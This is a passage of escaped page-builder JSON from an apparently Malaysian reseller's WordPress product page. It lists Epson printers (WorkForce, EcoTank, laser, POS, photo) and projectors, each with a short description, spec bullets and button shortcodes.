font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 